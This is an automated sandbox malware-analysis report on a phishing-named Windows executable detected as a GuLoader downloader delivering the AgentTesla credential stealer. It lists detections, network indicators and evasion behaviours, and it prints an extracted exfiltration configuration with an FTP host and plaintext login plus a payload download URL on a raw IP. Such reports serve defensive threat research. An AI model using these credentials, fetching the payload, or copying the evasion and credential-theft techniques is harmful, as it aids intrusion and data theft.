Edit tour

Windows Analysis Report
Shipping documents 000293994900.exe

Overview

General Information

Sample name:	Shipping documents 000293994900.exe
Analysis ID:	1546020
MD5:	c8d26f7208eaaa31a839ec190489c9a1
SHA1:	c9bc4695a4f4afdcc89d216b7ad8d0ce4d0bc7e3
SHA256:	f96b6c703fe5b13fd985d91da265c58d3d5b2f81397ebe27527e59c208819d2e
Tags:	exeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected AgentTesla

Yara detected GuLoader

AI detected suspicious sample

Initial sample is a PE file and has a suspicious name

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Shipping documents 000293994900.exe (PID: 5436 cmdline: "C:\Users\user\Desktop\Shipping documents 000293994900.exe" MD5: C8D26F7208EAAA31A839EC190489C9A1)

Shipping documents 000293994900.exe (PID: 6496 cmdline: "C:\Users\user\Desktop\Shipping documents 000293994900.exe" MD5: C8D26F7208EAAA31A839EC190489C9A1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.3323810255.0000000035761000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3323810255.0000000035761000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.3041044972.0000000006125000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Shipping documents 000293994900.exe PID: 6496	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Shipping documents 000293994900.exe PID: 6496	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 1 entries

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T11:39:18.753332+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.5	49704	TCP
2024-10-31T11:39:59.461244+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.5	56127	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T11:40:48.544514+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	56194	84.38.133.42	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: Shipping documents 000293994900.exe.5436.0.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: Shipping documents 000293994900.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:56195 version: TLS 1.2

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_0040276E FindFirstFileW,	4_2_0040276E
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405770
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_0040622B FindFirstFileW,FindClose,	4_2_0040622B

Source: Joe Sandbox View	IP Address: 192.185.13.234 192.185.13.234
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:56194 -> 84.38.133.42:80
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:56127

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /FZBmQQQpasdj30.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.42Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.42

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /FZBmQQQpasdj30.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.42Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ftp.concaribe.com

Source: Shipping documents 000293994900.exe, 00000004.00000002.3304876105.0000000006DC0000.00000004.00001000.00020000.00000000.sdmp, Shipping documents 000293994900.exe, 00000004.00000002.3304583690.0000000005426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.133.42/FZBmQQQpasdj30.bin
Source: Shipping documents 000293994900.exe, 00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://concaribe.com
Source: Shipping documents 000293994900.exe, 00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.concaribe.com
Source: Shipping documents 000293994900.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Shipping documents 000293994900.exe, 00000004.00000002.3323810255.0000000035711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Shipping documents 000293994900.exe, 00000004.00000002.3323810255.0000000035711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: Shipping documents 000293994900.exe, 00000004.00000002.3323810255.0000000035711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: Shipping documents 000293994900.exe, 00000004.00000002.3323810255.0000000035711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: Shipping documents 000293994900.exe, 00000000.00000002.3040528511.0000000002843000.00000004.00000020.00020000.00000000.sdmp, nsj89C.tmp.0.dr, 660.jpg.0.dr	String found in binary or memory: https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg

Source: unknown	Network traffic detected: HTTP traffic on port 56195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56195

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:56195 version: TLS 1.2

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052D1

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Shipping documents 000293994900.exe

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_00403358
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		4_2_00403358

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 0_2_00404B0E	0_2_00404B0E
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 0_2_0040653D	0_2_0040653D
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_00404B0E	4_2_00404B0E
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_0040653D	4_2_0040653D
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_0016A214	4_2_0016A214
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_0016E360	4_2_0016E360
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_00164A58	4_2_00164A58
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_0016AAAA	4_2_0016AAAA
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_00163E40	4_2_00163E40
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_00164188	4_2_00164188
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_0016DA78	4_2_0016DA78
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_37FECE21	4_2_37FECE21
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_37FEBB90	4_2_37FEBB90
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_37FEA7DC	4_2_37FEA7DC
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_388D3158	4_2_388D3158
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_388DB2F0	4_2_388DB2F0
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_388DC240	4_2_388DC240
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_388D56A0	4_2_388D56A0
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_388D66C0	4_2_388D66C0
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_388D7E40	4_2_388D7E40
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_388D0040	4_2_388D0040
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_388D2370	4_2_388D2370
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_388DE468	4_2_388DE468
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_388D5DB7	4_2_388D5DB7
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_388D7760	4_2_388D7760
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Code function: 4_2_38CA2B98	4_2_38CA2B98

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Code function: String function: 00402B38 appears 47 times

Source: Shipping documents 000293994900.exe, 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamekinglet.exe> vs Shipping documents 000293994900.exe
Source: Shipping documents 000293994900.exe, 00000004.00000000.3037015443.0000000000454000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamekinglet.exe> vs Shipping documents 000293994900.exe
Source: Shipping documents 000293994900.exe, 00000004.00000002.3304583690.000000000546E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Shipping documents 000293994900.exe
Source: Shipping documents 000293994900.exe, 00000004.00000002.3323761608.00000000355C9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Shipping documents 000293994900.exe
Source: Shipping documents 000293994900.exe	Binary or memory string: OriginalFilenamekinglet.exe> vs Shipping documents 000293994900.exe

Source: Shipping documents 000293994900.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/9@2/3

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045C8

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

File created: C:\Users\user\Uploadable

Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

File created: C:\Users\user\AppData\Local\Temp\nsu88C.tmp

Jump to behavior

Source: Shipping documents 000293994900.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

File read: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Shipping documents 000293994900.exe "C:\Users\user\Desktop\Shipping documents 000293994900.exe"
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process created: C:\Users\user\Desktop\Shipping documents 000293994900.exe "C:\Users\user\Desktop\Shipping documents 000293994900.exe"
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Process created: C:\Users\user\Desktop\Shipping documents 000293994900.exe "C:\Users\user\Desktop\Shipping documents 000293994900.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Section loaded: msasn1.dll	Jump to behavior
